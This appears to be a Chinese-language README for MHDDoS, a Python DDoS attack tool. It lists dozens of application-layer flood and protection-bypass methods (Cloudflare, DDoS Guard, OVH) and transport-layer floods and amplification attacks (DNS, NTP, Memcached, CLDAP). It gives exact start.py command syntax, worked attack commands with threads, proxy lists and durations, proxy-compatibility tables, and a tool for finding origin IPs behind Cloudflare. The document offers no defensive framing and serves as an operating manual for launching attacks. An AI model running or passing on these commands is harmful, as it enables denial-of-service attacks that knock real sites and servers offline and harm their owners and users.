MHDDoS
1.关于 MHDDoS
MHDDoS – 基于 Python 开发的具有 56 种方法的 DDoS 攻击脚本
2.工具技术
Layer7 (应用层)
GET | GET 泛洪
POST | POST 泛洪
OVH | 绕过 OVH
RHEX | 随机 HEX
STOMP | 绕过 chk_captcha
STRESS | 使用高位字节发送 HTTP 包
DYN | 一种随机子域名的新方法
DOWNLOADER | 缓慢读取数据的新方法
SLOW | 一种 DDoS 的技术
HEAD|https://developer.mozilla.org/en-
US/docs/Web/HTTP/Methods/HEAD
NULL | 空 UserAgent
COOKIE | 随机 Cookie PHP ‘if (isset ($_COOKIE))’
PPS | 仅 ‘GET / HTTP/1.1\r\n\r\n’
EVEN | 包含更多 Header 的 GET 方法
GSB | Google Project Shield 绕过
DGB | DDoS Guard 绕过
AVB | Arvan Cloud 绕过
BOT | Like Google bot
APACHE | Apache 漏洞利用
XMLRPC | WP XMLRPC 漏洞利用 (add /xmlrpc.php)
CFB | CloudFlare 绕过
CFBUAM | CloudFlare Under Attack Mode 绕过
绕过 | 绕过 Normal AntiDDoS
BOMB | 绕过 with codesenberg/bombardier
KILLER | 执行多线程 DDoS 攻击
TOR | 绕过 onion website
Layer4 (传输层)
TCP | TCP 泛洪绕过
UDP | UDP 泛洪绕过
SYN | SYN 泛洪
CPS | 开启或关闭连接代理
ICMP | Icmp 请求泛洪 (Layer3)
CONNECTION | 使用代理打开活动连接
VSE | 发送 VSE 协议
TS3 | 发送 Teamspeak 3 Status Ping 协议
FIVEM | 发送 Fivem Status Ping 协议
MEM | Memcached 放大攻击
NTP | NTP 放大攻击
MCBOT | Minecraft Bot 攻击
MINECRAFT | Minecraft Status Ping 协议
MCPE | Minecraft PE Status Ping 协议
DNS | DNS 放大攻击
CHAR | Chargen 放大攻击
CLDAP | Cldap 放大攻击
ARD | Apple Remote Desktop 放大攻击
RDP | Remote Desktop Protocol 放大攻击
工具
CFIP | 寻找基于 Cloudflare 的网站真实 IP 地址
DNS | 显示站点的 DNS 记录
TSSRV | TeamSpeak SRV 解析器
PING | PING 服务器
CHECK | 检测目标站点状态
DSTAT | 显示收到的字节数据
其他
STOP | 终止所有攻击测试
TOOLS | 终端工具
HELP | 显示工具帮助信息
3.使用
-
第七层:
python3 start.py <1=method> <2=url> <3=socks_type> <4=threads> <5=proxylist> <6=rpc> <7=duration> <8=debug=optional>
-
第 4 层正常:
python3 start.py <1=方法> <<2=ip:端口>> <3=线程> <4=持续时间> <5=调试=可选>
-
第 4 层代理:
python3 start.py <1=method> <2=ip:port> <3=threads> <4=duration> <5=socks_type> <6=proxylist> <7=debug=optional>
-
Layer4 放大:
python3 MHDDoS/start.py <1=method> <2=ip:port> <3=threads> <4=duration> <5=refelector file> <6=debug=optional>
- 1:方法(攻击类型)
- 2:目标 URL 或 IP 地址
- 3:要使用的线程数(多线程)
- 4:持续时间(以秒为单位完成攻击的时间)
- 5:反射器文件(Reflectors File)
- 6:调试模式(可选)
例子
- 第 7 层(网站):
# Running bypass attack from 101 threads,
# with socks 5, 100 requests per proxy (connection), for 3600 seconds
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 proxy.txt 100 3600
- 第 4 层(服务器/家庭):
# Running udp attack from 1 threads, for 3600 seconds
python start.py udp 1.1.1.1:53 1 3600
# Running dns attack from 100 threads, for 3600 seconds
# with reflector servers from dns.txt, for 3600 seconds
python start.py dns 1.1.1.1:53 100 3600 dns.txt
# Running minecraft attack from 1000 threads
# with socks 5, for 3600 seconds
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
- 调试模式(记录攻击状态):
python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true
- 工具/帮助:
python start.py tools
python start.py help
4.代理
Proxy Types
Proxy Type | Value |
---|---|
All Proxy | 0 |
HTTP | 1 |
SOCKS4 | 4 |
SOCKS5 | 5 |
RANDOM | 6 |
使用代理的 Layer4 方法
Proxy Type | MINECRAFT | MCBOT | MEM | RDP | NTP | TCP | ARD | VSE | SYN | UDP | CHAR |
---|---|---|---|---|---|---|---|---|---|---|---|
HTTP | ✅ | ✅ | ❌ | ❌ | ❌ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ |
SOCKS4 | ✅ | ✅ | ❌ | ❌ | ❌ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ |
SOCKS5 | ✅ | ✅ | ❌ | ❌ | ❌ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ |
Proxy Type | CONNECTION | CPS | DNS | TS3 | MCPE | CLDAP | FIVEM |
---|---|---|---|---|---|---|---|
HTTP | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ |
SOCKS4 | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ |
SOCKS5 | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ |
使用代理的 Layer7 方法
Proxy Type | COOKIE | BYPASS | OVH | DGB | STRESS | DOWNLOADER | BOMB | NULL | AVB | GET |
---|---|---|---|---|---|---|---|---|---|---|
HTTP | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
SOCKS4 | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ❌ | ✅ | ✅ | ✅ |
SOCKS5 | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
Proxy Type | CFB | POST | EVEN | DYN | GSB | XMLRPC | SLOW | BOT | PPS | CFBUAM | APACHE |
---|---|---|---|---|---|---|---|---|---|---|---|
HTTP | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
SOCKS4 | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
SOCKS5 | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
Proxy Type | KILLER | RHEX | STOMP |
---|---|---|---|
HTTP | ✅ | ✅ | ✅ |
SOCKS4 | ✅ | ✅ | ✅ |
SOCKS5 | ✅ | ✅ | ✅ |
5.工具
Command Line
python3 start.py tools
Tools List
Name | About |
---|---|
CFIP | Find Real IP Address Of Websites Powered By Cloudflare. |
PING | Response time of icmp request. |
DSTAT | That Shows Bytes Received, bytes Sent and their amount. |
INFO | about site like country. |
CHECK | Check If Websites Status. |
TSSRV | TeamSpeak SRV Resolver. |
DNS | Show DNS Records Of Sites. |
Other Commands
Name | About |
---|---|
CLEAR | Clear Console. |
BACK | Back to main console or previous input. |
EXIT | Close Console and exit from script. |
HELP | Show Help Message. |